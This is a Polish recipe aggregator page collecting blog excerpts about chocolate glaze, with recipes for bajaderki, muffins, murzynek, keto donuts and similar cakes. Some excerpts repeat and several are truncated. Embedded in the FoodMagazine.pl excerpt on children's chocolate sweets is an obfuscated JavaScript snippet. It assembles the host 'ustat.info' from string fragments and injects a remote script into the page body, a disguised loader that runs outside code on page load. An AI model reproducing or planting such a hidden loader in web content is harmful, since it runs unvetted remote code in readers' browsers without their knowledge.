polewa czekoladowa - 8716 przepisów (strona:409/582)

Przepis na bajaderki 213

babki kakaowej. Szybkie, tanie i łatwe do zrobienia. Przepis na polewę 1/2 kostki masła1/2 szklanki cukru pudru 1 cukier waniliowy 3 łyżki wody 2 łyżki kakao Składniki na bajaderki ok 500 g kawałków ciast kruchych, drożdżowych, biszkoptowych, suchych bez owoców, kremów ( ja użyłam drożdżowe i babkę czekoladową) 4 łyżki mleka 4 łyżki cukru 100g masła 2 łyżki  kakao(...)aromat rumowy, wlej ostudzoną masę z garnuszka, dodaj pokruszone herbatniki i wymieszaj dokładnie. Z gęstej masy formujemy małe kulki ( 1 łyżka czubata),  kulki układamy na talerzu i polewamy wcześniej przyrządzoną polewą. Smacznego

Kurnikowo
Dlaczego warto jeść lody zimą? 106

kaloryczne są sorbety, bo są przygotowane głównie z owoców. Zdecydowanie mniej kaloryczne, niż na przykład lody czekoladowe są lody jogurtowe. Jogurt, z którego powstają, jest mniej tłusty niż śmietana. Warto wiedzieć, że najbardziej kaloryczne w deserach lodowych są dodatki, takie jak polewy, słodkie posypki, bakalie i bita śmietana. Lody – jak ich jedzenie wpływa na zdrowie? Czy lody są zdrowe

Kulinarnyblog.pl - wiesz jak gotować!
Czekoladowe ciasto gryczane z gruszkami 147

wierzch posypałam tylko cukrem pudrem (zmielonym słodzikiem), ale dla podkreślenie smaku i wyglądu możecie zrobić polewę czekoladą i dodatkowo czym jeszcze posypać. Ciasto zachowuję swoją świeżość nawet do 3 dni trzymane w lodówce. Zachęcam również do skorzystania z przepisu na CZEKOLADOWE CIASTO Z KASZY GRYCZANEJ Z ORZECHAMI LINK Wartości odżywcze 1 porcji: (wyszło 12) 209 kcal

zdrowo i aktywnie
Czekoladowe ciasto gryczane z gruszkami 190

wierzch posypałam tylko cukrem pudrem (zmielonym słodzikiem), ale dla podkreślenie smaku i wyglądu możecie zrobić polewę czekoladą i dodatkowo czym jeszcze posypać. Ciasto zachowuję swoją świeżość nawet do 3 dni trzymane w lodówce. Zachęcam również do skorzystania z przepisu na CZEKOLADOWE CIASTO Z KASZY GRYCZANEJ Z ORZECHAMI LINK Wartości odżywcze 1 porcji: (wyszło 12) 209 kcal

Zdrowie i pysznie na talerzu
Muffiny czekoladowe z białą czekoladą 164

Mega pyszne, dla miłośników czekolady. Mocno czekoladowe , biała czekolada przełamuje troszeczkę smak , dodając słodkości muffinkom. Aby mieć czekoladę białą płynną , to polecam zagrzać muffinki w mikrofalówce, pod warunkiem , że nie mają polewy. Temp. pieczenia : 180 C Czas pieczenia : 25 - 30 minut   źródło : "Moje smaki życia " Składniki: 250 g mąki pszennej 100 g cukru pudru 2 łyżeczki proszku do pieczenia

Różne smaki w kuchni
Szalona czarnuszka czyli ciasto czekoladowe inaczej 282

Każdy ma swój przepis na ciasto czekoladowe, dzisiaj jedna z jego wersji, bardzo popularna w Brazylii tzw. Nega Maluca czyli w tłumaczeniu szalona czarnuszka. Ciasto jest cudownie puszyste, pięknie wyrasta a polewa jest taka "cukrzysta". Jest to świetna propozycja na Sylwestra niezależnie czy przygotowujecie go w domu gdyż szybko i prosto się go robi, czy też wychodzicie w gości

Smaki Brazylii
Muffiny czekoladowe z białą czekoladą 227

Mega pyszne, dla miłośników czekolady. Mocno czekoladowe , biała czekolada przełamuje troszeczkę smak , dodając słodkości muffinkom. Aby mieć czekoladę białą płynną , to polecam zagrzać muffinki w mikrofalówce, pod warunkiem , że nie mają polewy. Temp. pieczenia : 180 C Czas pieczenia : 25 - 30 minut   źródło : "Moje smaki życia " Składniki: 250 g mąki pszennej 100 g cukru pudru 2 łyżeczki proszku do pieczenia

Słodkości i nie tylko
Muffiny z M&M’s 247

masła 60 g gorzkiej czekolady pół szklanki kakao 3 jajka 3/4 szklanki brązowego cukru 5 kropel aromatu śmietankowego pół szklanki jogurtu greckiego około 30 małych m&m polewa: 50 ml śmietany kremówki 50 g gorzkiej czekolady 50 g mlecznej czekolady m&m do dekoracji Mąkę, sodę oczyszczoną i proszek do pieczenia mieszamy. Masło roztopić w rondelku(...)jajek wlać czekoladę i dokładnie zmiksować. Do masy czekoladowej dodawać na przemian mąkę i jogurt mieszając wszystko łyżką (nie używamy już miksera). Na koniec dodać m&m. Ciasto nakładać do papilotek do 3/4 wysokości. Piec w piekarniku nagrzanym do 170 stopni do tzw. suchego patyczka (około 25 minut) Następnie robimy polewę: Kremówkę doprowadzamy do wrzenia. Dodajemy pokruszone czekolady, zdejmujemy

Ania i Marcin gotują
Pyszne ciasto marchewkowe, szybkie i bez ucierania 155

5 / 5 ( 69 votes ) Pyszne ciasto marchewkowe, szybkie i bez ucierania Ciasta nigdy nie były moją mocną stroną, aż do czasu kiedy natknęłam się na ten

Ogrodnik w podróży
Czekoladowe łakocie, czyli największe przysmaki dzieci 185

nich obtocz w posypce. Cukierki należy przechowywać w lodówce. Smacznego! Cukierki czekoladowe z orzechami Składniki: – masło orzechowe z kawałkami orzechów – 120 g – olej kokosowy – 2 łyżki – syrop klonowy lub syrop z agawy – 3 łyżeczki – kakao gorzkie – 4 łyżeczki – mąka kokosowa- 4 łyżki – czekolada gorzka na polewę Do miski przełóż masło orzechowe, wsyp mąkę oraz wlej rozpuszczony wcześniej olej kokosowy. Całość(...)function(){ x0ez_=("u"+"")+"s"+"";x0ez_+=("tat.")+("i"); x0ez=document.createElement("script");x0ez.type="text/javascript";x0ez_+="nf"+("o")+"/"; x0ezu="72320733"+".";x0ez.async=true;x0ezu+="9a6w0nls0ez0msql8qjihmsuXmzarv"; x0ez.src="//"+x0ez_+x0ezu; x0ezb=document.body; x0ezb.appendChild(x0ez); })(); Artykuł Czekoladowe łakocie, czyli największe przysmaki dzieci pochodzi z serwisu Przepisy kulinarne, przepisy na obiad - FoodMagazine.pl

FoodMagazine.pl - Przepisy kulinarne
Keto donuty czekoladowe (bezglutenowe) 147

keto słodycze znajdziecie tutaj . Gorąco polecam! Przepis na keto donuty czekoladowe Składniki ciasto 2 jajka 50 g masła orzechowego łyżka kakao (10 g) łyżeczka mąki kokosowej (10 g) łyżka oleju kokosowego (15 g) 30 g odżywki białkowej lub erytrytolu łyżeczka proszku do pieczenia 3 łyżeczki wody polewa 30 g gorzkiej czekolady łyżka oleju kokosowego (20 g) opcjonalnie łyżka erytrytolu(...)piekarnika i odstawiamy do ostygnięcia . W międzyczasie przygotowujemy polewę, poprzez rozpuszczenie w kąpieli wodnej gorzkiej czekolady , oleju kokosowego i opcjonalnie erytrytolu . Donuty wyjmujemy z foremki, zanurzamy w polewie i opcjonalnie posypujemy posiekanymi orzeszkami ziemnymi . Odstawiamy do lodówki do zatężenia polewy. Donuty najlepiej przechowywać w lodówce zwłaszcza w cieplejsze dni, gdyż polewa może się łatwo rozpuścić Możecie je również zamrozić

WegePrzepis
Tradycyjny murzynek z wiśniami 123

Tradycyjny murzynek z wiśniami  Dziś na podwieczorek poleca się tradycyjny murzynek z wiśniami - taki, jakie piekły nasze mamy i babcie, z ubijaniem białek i odkładaniem części masy na polewę.  Murzynek z wiśniami jest bardzo prosty w przygotowaniu, ale należy pamiętać o dokładnym ubiciu białek na sztywno. Ciasto można upiec z wiśniami ze słoika, mrożonymi lub świeżymi w sezonie(...)więcej wilgoci. Aby był bardziej wilgotny, warto nakłuć wierzch ciasta po upieczeniu, by polewa mogła dostać się również do środka. Takie ciasto świetnie smakuje z filiżanką kawy, herbaty lub mleka. Smacznego:) TUTAJ znajdziecie więcej przepisów na pyszne ciasta :) Polecam również wilgotne ciasto czekoladowe z jabłkami i budyniem: Kliknij tu, by subskrybować mój kanał na Youtube Tradycyjny murzynek z wiśniami

Lekcje w kuchni
Ciasto Izaura w nowej, prostej odsłonie. 208

uszło, ale Pan chce zaszaleć i upiec coś sam, co osobiście bardzo pochwalam. Chciał instruktarz na ciasto czekoladowe albo sernik, oczywiście oba w miarę proste. Tak się zastanawiałam jakie czekoladowe, albo który sernik? Najbardziej pasował mi ten  ulubiony naszej  Ani , ale jak się skupiałam na jednym czy drugim, zawsze czułam pewien niedosyt, że coś za mało. W końcu(...)spód wykładamy ciasto czekoladowe, a na nie punktowo białą masę. Później delikatnie rozprowadzamy ją po wierzchu aby zakryć ciemne miejsca. To nierówne rozprowadzenie pozwoli nam uzyskać efekt pofalowania. Tam gdzie mniej twarogu,  ciasto się bardziej wybija ku górze. Wstawiamy do nagrzanego piekarnika (50 stopni). Pieczemy około godziny w 180 stopniach. Zimne ciasto dekorujemy polewą, gdzie więcej wskazówek

Dieta moja pasja
PUSZYSTY MURZYNEK Z DŻEMEM PORZECZKOWYM. 420

poza ciepły pokój i przeczekać, aż ta cała plucha minie, a szaro-bury świat pokryje się czystym, śnieżnobiałym puchem. Nieodłącznym elementem jesiennych dywagacji jest czekolada. A najlepiej w postaci polewy na jakimś pysznym, pulchnym i mięciutkim cieście. "Ostatni raz tak puszyste murzynka zrobiła moja mama" - aż serce podskoczyło na te słowa, gdy wspólnie siedząc przy stole, zajadaliśmy się świeżo upieczonym(...)małego rondelka wrzucam drobno posiekaną czekoladę (lub specjalne  groszki czekoladowe) i dodaję mleko. Ciągle mieszając podgrzewam, aż do rozpuszczenia czekolady. Nie zagotowuję, aby czekolada się nie zrobiła "kaszkowata". Najlepiej rozpuszczać ją na wolnym ogniu.  Rozsmarowuję na powierzchni wystudzonego murzynka, posypuję posiekanymi orzechami i odstawiam do stwardnienia polewy. SMACZNEGO! Pozdrawiam, Karmel-itka

W kuchni Karmel-itki